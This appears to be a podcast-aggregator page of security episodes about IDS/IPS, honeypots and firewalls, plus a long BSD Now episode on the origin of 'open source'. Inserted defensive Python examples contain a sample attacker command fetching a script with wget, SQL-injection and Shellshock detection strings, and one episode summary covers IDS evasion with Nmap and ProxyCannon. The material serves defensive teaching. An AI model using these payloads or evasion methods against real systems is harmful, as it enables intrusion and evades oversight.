TechVibe Radio geeks out with Advanticom's Keith Arnold to explore its Active Threat Incident Response Team. Keith discusses how the benefit of leveraging a managed security service provider for your security needs is their ability to threat hunt, or proactively look for any undetected threats within your network. Advanticom has the unique ability to not only defend against a breach but also engage in direct breach and incident response. We are on the edge of major incidents and outbreaks with phishing, ransomware, and advanced persistent threat (APT) groups. Should something be identified, Advanticom's experts will begin their emergency security response, which includes a plan to minimize any negative impact on the business, and will immediately start the process to contain and isolate the threat. As part of Advanticom's unique solution, its team will install network sensors for IDS/IPS while leveraging EPP and EDR monitoring from its forensics team. In the event of an emergency, it can install a logging platform and correlation engine to assist in containment. This will immediately help Advanticom's managed security services group transition into eradication and remediation efforts. Founded in 1995, Advanticom has been delivering expert technology solutions to clients all over the region. It was founded on the concept of combining excellent service with customized, efficient solutions. Innovation and client satisfaction are its main motivators. To provide high-quality service, you need a strong team to support those initiatives. Advanticom believes it has the best technical and supporting team members available in Pittsburgh. These talented experts are empowered to solve problems and issues. They are constantly reviewing industry trends and concerns, paying attention to threats and new opportunities, and homing in on things that can improve the efficiency and business operations of its clients.

Cybersecurity FOREVER
#155: Why are IDS and IPS Critical for Cybersecurity?

Cybersecurity FOREVER

Play Episode Listen Later Jan 2, 2021 13:24


Today I will discuss: 1. What are IDS & IPS? 2. How can IDS/IPS protect your organization from cyber-attacks? 3. How can a single click generate a long sequence of multiple attacks? 4. What are the opportunities for you?

Cybersecurity FOREVER
#108: How Can IPS & IDS Protect Your Network From Cyber-attacks?

Cybersecurity FOREVER

Play Episode Listen Later Nov 5, 2020 6:49


Today I will discuss: 1. What is the importance of IPS/IDS? 2. Why should you use IPS/IDS in your network? 3. How can IDS/IPS stop many cyber-attacks?

Cybercrimeology
Cybercrime and Deterrence: The Theory behind Stop it!, or else ...

Cybercrimeology

Play Episode Listen Later May 14, 2020 37:08


About the Guest: https://aysps.gsu.edu/profile/david-maimon-2/
The Evidence-Based Cybersecurity Research Group: https://ebcs.gsu.edu/

Papers mentioned in this episode:
Maimon, D., Alper, M., Sobesto, B. and Cukier, M. (2014), Restrictive Deterrent Effects of a Warning Banner in an Attacked Computer System. Criminology, 52: 33-59. doi:10.1111/1745-9125.12028
Testa, A., Maimon, D., Sobesto, B. and Cukier, M. (2017), Illegal Roaming and File Manipulation on Target Computers. Criminology & Public Policy, 16: 689-726. doi:10.1111/1745-9133.12312
David Maimon, Theodore Wilson, Wuling Ren, Tamar Berenblum, On the Relevance of Spatial and Temporal Dimensions in Assessing Computer Susceptibility to System Trespassing Incidents, The British Journal of Criminology, Volume 55, Issue 3, May 2015, Pages 615–634, https://doi.org/10.1093/bjc/azu104

Other:
Not mentioned at all, but this series of white papers compiling evidence for particular defensive tools or strategies is very handy.
Existing Evidence for the Effectiveness of Antivirus in Preventing Cyber Crime Incidents, David Maimon
Existing Evidence for the Effectiveness of Firewalls in Preventing Cyber Crime Incidents, David Maimon
Existing Evidence for the Effectiveness of Honeypots in Preventing Cyber Crime Incidents, David Maimon
Existing Evidence for the Effectiveness of IDS/IPS in Preventing Cyber Crime Incidents, David Maimon
Existing Evidence for the Effectiveness of Passwords in Preventing Cyber Crime Incidents, David Maimon
Existing Evidence for the Effectiveness of Prompt Vulnerability Patching in Preventing Cyber Crime Incidents, David Maimon
https://scholarworks.gsu.edu/ebcs_tools/

The Tech Blog Writer Podcast
1192: How Security Will Change in a Post-COVID-19 World

The Tech Blog Writer Podcast

Play Episode Listen Later May 2, 2020 29:00


Privafy is redefining how to protect Data-in-Motion. Data-in-motion has rapidly become the most vulnerable part of every organization's information and communication architecture. As organizations embrace the openness of the Internet and move data and applications to the cloud, traditional network security technologies and systems are no longer effective in protecting data as it moves between cloud workloads and applications. The Internet is now the new network, allowing businesses and employees to connect easily with customers, partners, and each other from any location. But as data traverses between locations, it is increasingly at risk from a multitude of vectors and threat actors. Privafy's security-as-a-service application secures data wherever it travels. The company's cloud-native technology integrates all the functionality of traditional point solutions, such as encryption, firewall, DDoS protection, IDS/IPS and DLP technology, to provide comprehensive data protection as it moves between locations, clouds, mobile devices, and IoT. Guru Pai joins me on the podcast to talk about the blurring of boundaries between home and the workplace and why it is an unsettling factor for many enterprises. We also discuss why WFH employee solutions often don't have the same protection and monitoring as the office, why compromises away from work premises will increase as a result, and examples such as an attacker tailgating into the enterprise. Guru also provides his five predictions of why and how digitalization and security will change in a post-COVID-19 world. Today's guest is an industry veteran with over 30 years of experience leading and scaling high-performance organizations ranging from startups to large global firms. A results-oriented executive, Guru co-founded Privafy with a mission to fix the currently flawed approach to securing Data-in-Motion.
Before Privafy, Guru served in senior roles at Verizon Communications, where he was responsible for overseeing the products, services, and operations for all of Verizon's businesses. Before Verizon, he served in varying senior executive roles at companies such as Sonus Networks, AT&T/Bell Labs and Motorola. Guru is also a successful entrepreneur, having founded technology startups within the networking and big data and analytics industries.

Collective Defense
Going After New Threats, Binaries, and Malware with Peter Rydzynski

Collective Defense

Play Episode Listen Later Apr 6, 2020 35:33


In this episode of the Collective Defense Podcast we are jumping into honeypots, honeynets, and how emerging threats can be proactively detected with Peter Rydzynski. On the news front we analyzed a number of stories including the most recent Marriott breach, zoombombs and WarDialz, and of course more insecure WordPress plugins.

Software mentioned in this episode:

SELKS (https://www.stamus-networks.com/scirius-open-source)
Both live and installable Network Security Management ISO based on Debian. Complete Suricata IDS/IPS ecosystem with its own graphic rule manager; from start to analysis of IDS/IPS and NSM events in 30 seconds. Major components: Suricata, Elasticsearch, Logstash, Kibana, Moloch, Scirius Community Edition, EveBox.

Cowrie (https://github.com/cowrie/cowrie)
Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python; in high interaction mode (proxy) it functions as an SSH and Telnet proxy to observe attacker behavior on another system. Cowrie is maintained by Michel Oosterhof.

Dionaea (https://github.com/DinoTools/dionaea)
This low-interaction honeypot written in C and Python uses the Libemu library to emulate the execution of Intel x86 instructions and detect shellcodes. In addition, it is a multi-protocol honeypot that offers support for protocols such as FTP, HTTP, Memcache, MSSQL, MySQL, SMB, TFTP, etc.
Protocols: blackhole, epmap, ftp, http, memcache, mirror, mqtt, mssql, mysql, pptp, sip, smb, tftp, upnp
Logging: fail2ban, hpfeeds, log_json, log_sqlite

Netcat (http://netcat.sourceforge.net/)
Netcat is a featured networking utility which reads and writes data across network connections using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. It provides access to the following main features:
Outbound and inbound connections, TCP or UDP, to or from any ports.
Featured tunneling mode which also allows special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).
Built-in port-scanning capabilities, with randomizer.
Advanced usage options, such as buffered send-mode (one line every N seconds), and hexdump (to stderr or to a specified file) of transmitted and received data.
Optional RFC854 telnet codes parser and responder.

Modern Honey Network (https://github.com/pwnlandia/mhn)
MHN is a centralized server for management and data collection of honeypots. MHN allows you to deploy sensors quickly and to collect data immediately, viewable from a neat web interface. Honeypot deploy scripts include several common honeypot technologies, including Snort, Cowrie, Dionaea, and glastopf, among others.
Features: MHN is a Flask application that exposes an HTTP API that honeypots can use to:
Download a deploy script
Connect and register
Download Snort rules
Send intrusion detection logs
It also allows system administrators to:
View a list of new attacks
Manage Snort rules: enable, disable, download
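
Since Cowrie's purpose, as described above, is to log brute-force attempts and the attacker's shell session, here is an added example of the triage one would run over its output. This is not code from the episode or the Cowrie project: the log lines are constructed, using the field names (eventid, src_ip, username, password, session, input) that Cowrie's JSON logger emits; the values, the brute-force threshold and the wget/curl parsing are assumptions for the demo.

```python
"""Added example (not from the episode or the Cowrie project): triage of
Cowrie-style JSON logs for brute-force sources, credentials tried, and what
an attacker ran once a login succeeded.

The log lines are constructed. Field names follow Cowrie's JSON output
(eventid, src_ip, username, password, session, input); the values, the
threshold and the command parsing are assumptions for the demo.
"""
import json
from collections import Counter, defaultdict

SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.7","session":"a1","timestamp":"2020-04-01T10:00:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"root","password":"123456","session":"a1","timestamp":"2020-04-01T10:00:01Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"root","password":"admin","session":"a1","timestamp":"2020-04-01T10:00:02Z"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.7","username":"admin","password":"admin","session":"a1","timestamp":"2020-04-01T10:00:03Z"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.7","username":"root","password":"toor","session":"a1","timestamp":"2020-04-01T10:00:04Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1","input":"uname -a","timestamp":"2020-04-01T10:00:05Z"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.7","session":"a1","input":"wget http://198.51.100.9/x.sh","timestamp":"2020-04-01T10:00:06Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.2","username":"admin","password":"admin","session":"b2","timestamp":"2020-04-01T10:01:00Z"}
not json at all
"""

LOGIN_EVENTS = ("cowrie.login.failed", "cowrie.login.success")


def parse_events(text):
    """One dict per valid JSON line; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def failed_logins_by_ip(events):
    return Counter(e["src_ip"] for e in events if e["eventid"] == "cowrie.login.failed")


def brute_forcers(events, threshold=3):
    """Sources with at least `threshold` failed logins (threshold is arbitrary here)."""
    return sorted(ip for ip, n in failed_logins_by_ip(events).items() if n >= threshold)


def top_credentials(events, n=3):
    """Most-tried username/password pairs, successful or not."""
    pairs = Counter((e["username"], e["password"]) for e in events if e["eventid"] in LOGIN_EVENTS)
    return pairs.most_common(n)


def post_login_commands(events):
    """Commands typed in sessions that authenticated, keyed by Cowrie session id."""
    authenticated = {e["session"] for e in events if e["eventid"] == "cowrie.login.success"}
    commands = defaultdict(list)
    for e in events:
        if e["eventid"] == "cowrie.command.input" and e["session"] in authenticated:
            commands[e["session"]].append(e["input"])
    return dict(commands)


def download_urls(events):
    """URLs passed to wget/curl after login: the usual payload-drop step."""
    urls = []
    for cmds in post_login_commands(events).values():
        for cmd in cmds:
            parts = cmd.split()
            if parts and parts[0] in ("wget", "curl"):
                urls.extend(p for p in parts[1:] if p.startswith(("http://", "https://")))
    return urls


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    print("brute-force sources:", brute_forcers(ev))
    print("top credentials:", top_credentials(ev))
    print("post-login commands:", post_login_commands(ev))
    print("download URLs:", download_urls(ev))
```

The download URLs are the part worth feeding onward: the host they point at is a candidate indicator for the IDS/IPS rules discussed elsewhere in this entry, and the credential pairs tell you which defaults are being sprayed against your address space.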

Virtual Stack
27 - Virtual Stack - VMware NSX Distributed IDS/IPS

Virtual Stack

Play Episode Listen Later Dec 2, 2019 41:30


On the 27th episode of the show, I’m joined by Stijn Vanveerdeghem, Senior Technical Product Manager at VMware.

Distributed IPS/IDS (Intrusion Prevention and Detection System) on NSX-T was one of the biggest announcements at VMworld 2019 Europe. Stijn is the Technical Product Manager behind this feature, and he took the time to explain to us what VMware is bringing to the security market and what distinctive benefits customers can gain from using this feature.

You can reach out to Stijn via LinkedIn (https://www.linkedin.com/in/stijnvanv/).

Virtual Stack is available on all major apps: Apple Podcast, Spotify, Google Podcast, Stitcher and more. Hope you enjoy the show. As usual, feel free to share your feedback via Twitter (@emregirici), LinkedIn or virtualstack.tech.

Show notes:
02:00 - Intro
04:45 - What did VMware announce at VMworld 2019 Europe?
07:50 - What is IPS/IDS, and what is the difference between IDS/IPS and a firewall or NGFW (next-gen FW)?
15:00 - Can you talk about the use cases for Distributed IDS?
21:00 - What additional benefits does VMware bring to the customer?
29:15 - Can you tell us a bit more about the architecture?
35:30 - What are the NSX-T IPS/IDS signatures based on?
37:15 - What about general availability?
38:30 - Closing notes

Links:
VMworld 2019 Europe session: What's New with NSX-T Micro-Segmentation (SAI2565BE) (IPS/IDS is covered at the end)
Official Product Page
VMware Blog about the feature announcement

Cyber Security Grey Beard
Ep. 7 - Cyber Security Job Technologies: WAF, IAM, Forensics, IDS/IPS

Cyber Security Grey Beard

Play Episode Listen Later Sep 16, 2019 12:00


Cyber Security Job information for students, early professionals, and experienced staff retraining or switching roles. Herein I cover what the following technologies are and what professionals use them: Web Application Firewall (WAF), Identity and Access Management (IAM), Forensics, Intrusion Detection System (IDS) and Intrusion Prevention System (IPS). Cyber Security Job guidance for students, early professionals and experienced individuals looking for a new profession in Cyber Security or retraining.

Przygody Przedsiębiorców
What MISTAKES You Make on the Internet: Piotr Konieczny. Niebezpiecznik. (Infoshare 2019)

Przygody Przedsiębiorców

Play Episode Listen Later Jun 4, 2019 23:20


The second guest in the bonus series tied to our collaboration with Infoshare is Piotr Konieczny, Chief Information Security Officer and founder of the niebezpiecznik.pl portal, which covers topics across digital security in the broad sense. He consults, advises, deploys and manages appliances for protecting and monitoring corporate networks (firewalls, IDS/IPS, DLP, WAF, web filtering). He also works in digital forensics (or, if you prefer, computer forensics), that is, intrusion analysis and data recovery.

Secure Digital Life (Audio)
Firewalls - Secure Digital Life #65

Secure Digital Life (Audio)

Play Episode Listen Later May 25, 2018 33:41


This week, Doug and Russ talk about Firewalls! These tools can actually deconstruct the frame into the data and evaluate many things including signature analysis, IDS/IPS, and other types of threat analysis. They discuss WAF, Packet Filtering, Ports, OWASP, and more on this episode of Secure Digital Life!   Full Show Notes: https://wiki.securityweekly.com/SDL_Episode65   Visit our website: http://securedigitallife.com

Secure Digital Life (Video)
Firewalls - Secure Digital Life #65

Secure Digital Life (Video)

Play Episode Listen Later May 22, 2018 33:45


This week, Doug and Russ talk about Firewalls! These tools can actually deconstruct the frame into the data and evaluate many things including signature analysis, IDS/IPS, and other types of threat analysis. They discuss WAF, Packet Filtering, Ports, OWASP, and more on this episode of Secure Digital Life! Full Show Notes: https://wiki.securityweekly.com/SDL_Episode65 Visit our website: http://securedigitallife.com Follow us on Twitter: https://www.twitter.com/securediglife
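
Both Secure Digital Life entries above (audio and video carry the same description) describe a firewall deconstructing a frame down to the data and applying signature analysis. The following added example, not code from the show or from any product, builds constructed Ethernet II / IPv4 / TCP frames with struct (checksums are left at zero because nothing here validates them), parses them back to addresses, ports and payload, and evaluates a tiny rule set that mixes plain port filtering with content signatures. The rule dictionaries are a demo format, not Snort or Suricata syntax, and the signature strings are illustrative.

```python
"""Added example (not from the show or any product): deconstruct an Ethernet
frame down to the TCP payload and run it through a toy rule set that mixes
port filtering with content signatures.

Frames are constructed with struct; IP and TCP checksums are left at zero
because nothing here validates them. The rule dicts are a demo format, not
Snort or Suricata syntax.
"""
import struct

ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Constructed Ethernet II / IPv4 / TCP frame carrying `payload`."""
    eth = b"\x00" * 6 + b"\x11" * 6 + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 20 + 20 + len(payload), 0, 0, 64, PROTO_TCP, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    # data offset 5 words, flags PSH|ACK, window 65535, checksum 0, urgent 0
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Return addresses, ports and payload, or None for non-IPv4 frames."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ihl = (frame[14] & 0x0F) * 4            # IP header length honours options
    proto = frame[14 + 9]
    pkt = {"src": ".".join(str(b) for b in frame[26:30]),
           "dst": ".".join(str(b) for b in frame[30:34]),
           "proto": proto}
    if proto != PROTO_TCP:
        return pkt
    t = 14 + ihl
    pkt["sport"], pkt["dport"] = struct.unpack("!HH", frame[t:t + 4])
    data_off = (frame[t + 12] >> 4) * 4     # TCP header length, options included
    pkt["payload"] = frame[t + data_off:]
    return pkt


# Toy rules: a port-only rule is all a packet filter can do; the others need the payload.
RULES = [
    {"name": "block telnet", "dport": 23},
    {"name": "sqli over http", "dport": 80, "content": b"' OR 1=1"},
    {"name": "shellshock", "content": b"() { :;};"},
]


def evaluate(frame):
    """Names of all rules the frame matches, in rule order."""
    pkt = parse_frame(frame)
    if pkt is None or "dport" not in pkt:
        return []
    hits = []
    for rule in RULES:
        if "dport" in rule and rule["dport"] != pkt["dport"]:
            continue
        if "content" in rule and rule["content"] not in pkt["payload"]:
            continue
        hits.append(rule["name"])
    return hits


if __name__ == "__main__":
    f = build_frame("192.0.2.1", "10.0.0.5", 40000, 80, b"GET /?id=1' OR 1=1-- HTTP/1.1\r\n")
    print(parse_frame(f)["src"], "->", parse_frame(f)["dport"], evaluate(f))
```

The "sqli over http" and "block telnet" rules show the difference the episode points at: a port filter alone passes the injection attempt because port 80 is allowed, while the content rule only fires after the frame has been unpacked through Ethernet, IP and TCP headers to reach the payload. Real engines also reassemble streams and normalise encodings before matching; this toy matches on a single frame.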

Tradecraft Security Weekly (Audio)
Evading Network-Based Detection Mechanisms - Tradecraft Security Weekly #24

Tradecraft Security Weekly (Audio)

Play Episode Listen Later Mar 29, 2018 19:41


In this episode of Tradecraft Security Weekly hosts Beau Bullock (@dafthack) and Mike Felch (@ustayready) discuss methods for evading network-based detection mechanisms. Many commercial IDS/IPS devices do a pretty decent job of detecting standard pentesting tools like Nmap when no evasion options are used. Additionally, companies are doing a better job at detecting and blocking IP addresses performing password attacks. Proxycannon is a tool that allows pentesters to spin up multiple servers to proxy attempts through to bypass some of these detection mechanisms. Links: Nmap Evasion Options - https://nmap.org/book/man-bypass-firewalls-ids.html ProxyCannon - https://www.shellntel.com/blog/2016/1/14/update-to-proxycannon

Tradecraft Security Weekly (Video)
Evading Network-Based Detection Mechanisms - Tradecraft Security Weekly #24

Tradecraft Security Weekly (Video)

Play Episode Listen Later Mar 29, 2018 19:41


In this episode of Tradecraft Security Weekly hosts Beau Bullock (@dafthack) and Mike Felch (@ustayready) discuss methods for evading network-based detection mechanisms. Many commercial IDS/IPS devices do a pretty decent job of detecting standard pentesting tools like Nmap when no evasion options are used. Additionally, companies are doing a better job at detecting and blocking IP addresses performing password attacks. Proxycannon is a tool that allows pentesters to spin up multiple servers to proxy attempts through to bypass some of these detection mechanisms. Links: Nmap Evasion Options - https://nmap.org/book/man-bypass-firewalls-ids.html ProxyCannon - https://www.shellntel.com/blog/2016/1/14/update-to-proxycannon
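
For both Tradecraft Security Weekly entries above (audio and video carry the same description), an added example of the detection gap the hosts describe. This is not code from the episode, from Nmap or from ProxyCannon: the connection records are constructed, and the thresholds and window are assumptions. A port-scan detector keyed on the source IP, which is how per-IP blocking and most scan signatures behave, fires on one host probing twenty ports, but goes quiet once the same twenty probes are spread round-robin across ten exit addresses, which is the effect a proxy pool gives the attacker. Keying the same detector on the target instead catches both.

```python
"""Added example (not from the episode, Nmap or ProxyCannon): why a port-scan
detector keyed on the source IP goes quiet when probes are spread across
many exit addresses, and how keying on the target recovers the detection.

Connection records are constructed as (seconds, src_ip, dst_ip, dst_port).
Thresholds and window are assumptions, chosen to be in the range typical
port-scan rules use, not any product's defaults.
"""
from collections import defaultdict

WINDOW_S = 60       # sliding window in seconds
PORTS_PER_KEY = 15  # distinct destination ports inside the window that trigger an alert


def single_source_scan(src="203.0.113.5", dst="10.0.0.8", n=20):
    """Constructed: one source probes n ports, one per second."""
    return [(i, src, dst, 1000 + i) for i in range(n)]


def distributed_scan(dst="10.0.0.8", n=20, sources=10):
    """Constructed: the same n probes, round-robin over `sources` exit IPs.

    This is the shape the traffic takes when an attacker proxies each attempt
    through a different cloud instance."""
    return [(i, f"198.51.100.{1 + i % sources}", dst, 1000 + i) for i in range(n)]


def _keys_over_threshold(records, key_index, threshold=PORTS_PER_KEY, window_s=WINDOW_S):
    """Keys (source or target) that touched >= threshold distinct ports within window_s."""
    by_key = defaultdict(list)
    for rec in sorted(records):
        by_key[rec[key_index]].append(rec)
    alerts = []
    for key, recs in by_key.items():
        for i, (ts, *_rest) in enumerate(recs):
            ports = {r[3] for r in recs[i:] if r[0] - ts <= window_s}
            if len(ports) >= threshold:
                alerts.append(key)
                break
    return sorted(alerts)


def scanning_sources(records):
    """Per-source detection: what per-IP blocking and most scan signatures key on."""
    return _keys_over_threshold(records, key_index=1)


def scanned_targets(records):
    """Per-target detection: source-agnostic, so spreading across IPs does not help."""
    return _keys_over_threshold(records, key_index=2)


if __name__ == "__main__":
    for name, recs in (("single source", single_source_scan()), ("distributed", distributed_scan())):
        print(f"{name}: per-source alerts={scanning_sources(recs)} "
              f"per-target alerts={scanned_targets(recs)}")
```

The same shift applies to the password-attack case the hosts mention: counting failures per source IP is defeated by rotating exit addresses, counting failures per target account or per target host is not.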

BSD Now
235: I C you BSD

BSD Now

Play Episode Listen Later Feb 28, 2018 125:28


How the term open source was created, running FreeBSD on ThinkPad T530, Moving away from Windows, Unknown Giants, as well as OpenBSD and FreeDOS. This episode was brought to you by Headlines How I coined the term 'open source' (https://opensource.com/article/18/2/coining-term-open-source-software) In a few days, on February 3, the 20th anniversary of the introduction of the term "open source software" is upon us. As open source software grows in popularity and powers some of the most robust and important innovations of our time, we reflect on its rise to prominence. I am the originator of the term "open source software" and came up with it while executive director at Foresight Institute. Not a software developer like the rest, I thank Linux programmer Todd Anderson for supporting the term and proposing it to the group. This is my account of how I came up with it, how it was proposed, and the subsequent reactions. Of course, there are a number of accounts of the coining of the term, for example by Eric Raymond and Richard Stallman, yet this is mine, written on January 2, 2006. It has never been published, until today. The introduction of the term "open source software" was a deliberate effort to make this field of endeavor more understandable to newcomers and to business, which was viewed as necessary to its spread to a broader community of users. The problem with the main earlier label, "free software," was not its political connotations, but that—to newcomers—its seeming focus on price is distracting. A term was needed that focuses on the key issue of source code and that does not immediately confuse those new to the concept. The first term that came along at the right time and fulfilled these requirements was rapidly adopted: open source. This term had long been used in an "intelligence" (i.e., spying) context, but to my knowledge, use of the term with respect to software prior to 1998 has not been confirmed. 
The account below describes how the term open source software caught on and became the name of both an industry and a movement. Meetings on computer security In late 1997, weekly meetings were being held at Foresight Institute to discuss computer security. Foresight is a nonprofit think tank focused on nanotechnology and artificial intelligence, and software security is regarded as central to the reliability and security of both. We had identified free software as a promising approach to improving software security and reliability and were looking for ways to promote it. Interest in free software was starting to grow outside the programming community, and it was increasingly clear that an opportunity was coming to change the world. However, just how to do this was unclear, and we were groping for strategies. At these meetings, we discussed the need for a new term due to the confusion factor. The argument was as follows: those new to the term "free software" assume it is referring to the price. Oldtimers must then launch into an explanation, usually given as follows: "We mean free as in freedom, not free as in beer." At this point, a discussion on software has turned into one about the price of an alcoholic beverage. The problem was not that explaining the meaning is impossible—the problem was that the name for an important idea should not be so confusing to newcomers. A clearer term was needed. No political issues were raised regarding the free software term; the issue was its lack of clarity to those new to the concept. Releasing Netscape On February 2, 1998, Eric Raymond arrived on a visit to work with Netscape on the plan to release the browser code under a free-software-style license. We held a meeting that night at Foresight's office in Los Altos to strategize and refine our message. In addition to Eric and me, active participants included Brian Behlendorf, Michael Tiemann, Todd Anderson, Mark S. Miller, and Ka-Ping Yee. 
But at that meeting, the field was still described as free software or, by Brian, "source code available" software. While in town, Eric used Foresight as a base of operations. At one point during his visit, he was called to the phone to talk with a couple of Netscape legal and/or marketing staff. When he was finished, I asked to be put on the phone with them—one man and one woman, perhaps Mitchell Baker—so I could bring up the need for a new term. They agreed in principle immediately, but no specific term was agreed upon. Between meetings that week, I was still focused on the need for a better name and came up with the term "open source software." While not ideal, it struck me as good enough. I ran it by at least four others: Eric Drexler, Mark Miller, and Todd Anderson liked it, while a friend in marketing and public relations felt the term "open" had been overused and abused and believed we could do better. He was right in theory; however, I didn't have a better idea, so I thought I would try to go ahead and introduce it. In hindsight, I should have simply proposed it to Eric Raymond, but I didn't know him well at the time, so I took an indirect strategy instead. Todd had agreed strongly about the need for a new term and offered to assist in getting the term introduced. This was helpful because, as a non-programmer, my influence within the free software community was weak. My work in nanotechnology education at Foresight was a plus, but not enough for me to be taken very seriously on free software questions. As a Linux programmer, Todd would be listened to more closely. The key meeting Later that week, on February 5, 1998, a group was assembled at VA Research to brainstorm on strategy. Attending—in addition to Eric Raymond, Todd, and me—were Larry Augustin, Sam Ockman, and attending by phone, Jon "maddog" Hall. The primary topic was promotion strategy, especially which companies to approach. 
I said little, but was looking for an opportunity to introduce the proposed term. I felt that it wouldn't work for me to just blurt out, "All you technical people should start using my new term." Most of those attending didn't know me, and for all I knew, they might not even agree that a new term was greatly needed, or even somewhat desirable. Fortunately, Todd was on the ball. Instead of making an assertion that the community should use this specific new term, he did something less directive—a smart thing to do with this community of strong-willed individuals. He simply used the term in a sentence on another topic—just dropped it into the conversation to see what happened. I went on alert, hoping for a response, but there was none at first. The discussion continued on the original topic. It seemed only he and I had noticed the usage. Not so—memetic evolution was in action. A few minutes later, one of the others used the term, evidently without noticing, still discussing a topic other than terminology. Todd and I looked at each other out of the corners of our eyes to check: yes, we had both noticed what happened. I was excited—it might work! But I kept quiet: I still had low status in this group. Probably some were wondering why Eric had invited me at all. Toward the end of the meeting, the question of terminology was brought up explicitly, probably by Todd or Eric. Maddog mentioned "freely distributable" as an earlier term, and "cooperatively developed" as a newer term. Eric listed "free software," "open source," and "sourceware" as the main options. Todd advocated the "open source" model, and Eric endorsed this. I didn't say much, letting Todd and Eric pull the (loose, informal) consensus together around the open source name. It was clear that to most of those at the meeting, the name change was not the most important thing discussed there; a relatively minor issue. Only about 10% of my notes from this meeting are on the terminology question. But I was elated. 
These were some key leaders in the community, and they liked the new name, or at least didn't object. This was a very good sign. There was probably not much more I could do to help; Eric Raymond was far better positioned to spread the new meme, and he did. Bruce Perens signed on to the effort immediately, helping set up Opensource.org and playing a key role in spreading the new term. For the name to succeed, it was necessary, or at least highly desirable, that Tim O'Reilly agree and actively use it in his many projects on behalf of the community. Also helpful would be use of the term in the upcoming official release of the Netscape Navigator code. By late February, both O'Reilly & Associates and Netscape had started to use the term. Getting the name out After this, there was a period during which the term was promoted by Eric Raymond to the media, by Tim O'Reilly to business, and by both to the programming community. It seemed to spread very quickly. On April 7, 1998, Tim O'Reilly held a meeting of key leaders in the field. Announced in advance as the first "Freeware Summit," by April 14 it was referred to as the first "Open Source Summit." These months were extremely exciting for open source. Every week, it seemed, a new company announced plans to participate. Reading Slashdot became a necessity, even for those like me who were only peripherally involved. I strongly believe that the new term was helpful in enabling this rapid spread into business, which then enabled wider use by the public. A quick Google search indicates that "open source" appears more often than "free software," but there still is substantial use of the free software term, which remains useful and should be included when communicating with audiences who prefer it. A happy twinge When an early account of the terminology change written by Eric Raymond was posted on the Open Source Initiative website, I was listed as being at the VA brainstorming meeting, but not as the originator of the term. 
This was my own fault; I had neglected to tell Eric the details. My impulse was to let it pass and stay in the background, but Todd felt otherwise. He suggested to me that one day I would be glad to be known as the person who coined the name "open source software." He explained the situation to Eric, who promptly updated his site. Coming up with a phrase is a small contribution, but I admit to being grateful to those who remember to credit me with it. Every time I hear it, which is very often now, it gives me a little happy twinge. The big credit for persuading the community goes to Eric Raymond and Tim O'Reilly, who made it happen. Thanks to them for crediting me, and to Todd Anderson for his role throughout. The above is not a complete account of open source history; apologies to the many key players whose names do not appear. Those seeking a more complete account should refer to the links in this article and elsewhere on the net.

FreeBSD on a Laptop - A guide to a fully functional installation of FreeBSD on a ThinkPad T530 (https://www.c0ffee.net/blog/freebsd-on-a-laptop)
As I stated in my previous post, I recently dug up my old ThinkPad T530 after the embarrassing stream of OS X security bugs this month. Although this ThinkPad ran Gentoo faithfully during my time in graduate school at Clemson, these days I'd much rather spend time with my wife and baby than fighting with emerge and USE flags. FreeBSD has always been my OS of choice, and laptop support seems to be much better than it was a few years ago. In this guide, I'll show you the tweaks I made to wrestle FreeBSD into a decent experience on a laptop. Unlike my usual posts, this time I'm going to assume you're already pretty familiar with FreeBSD.
If you're a layman looking for your first BSD-based desktop, I highly recommend checking out TrueOS (previously PC-BSD): they've basically taken FreeBSD and packaged it with all the latest drivers, along with a user-friendly installer and custom desktop environment out of the box. TrueOS is an awesome project–the only reason I don't use it is because I'm old, grumpy, and persnickety about having my operating system just so. Anyway, if you'd still like to take the plunge, read on. Keep in mind, I'm using a ThinkPad T530, but other ThinkPads of the same generation should be similarly compatible.

Here's what you'll get:
+ Decent battery life (8-9 hours with a new 9-cell battery)
+ UEFI boot and full-disk encryption
+ WiFi (Intel Ultimate-N 6300)
+ Ethernet (Intel PRO/1000)
+ Screen brightness adjustment
+ Suspend/Resume on lid close (make sure to disable TPM in BIOS)
+ Audio (Realtek ALC269 HDA, speakers and headphone jack)
+ Keyboard multimedia buttons
+ Touchpad/Trackpoint
+ Graphics Acceleration (with integrated Intel graphics, NVIDIA card disabled in BIOS)

What I haven't tested yet:
+ Bluetooth
+ Webcam
+ Fingerprint reader
+ SD Card slot

Sections covered:
+ Installation
+ Power Saving Tweaks for Desktop Use
+ X11
+ Fonts
+ Login Manager: SLiM
+ Desktop Environment: i3
+ Applications

The LLVM Sanitizers stage accomplished (https://blog.netbsd.org/tnf/entry/the_llvm_sanitizers_stage_accomplished)

I've managed to get the Memory Sanitizer to work for the elementary base system utilities, like ps(1), awk(1) and ksh(1). This means that the toolchain is ready for tests and improvements. I've iterated over the base system utilities and looked for bugs, both in programs and in sanitizers. The number of detected bugs in the userland programs was low; there was merely one reading of an uninitialized variable in ps(1).

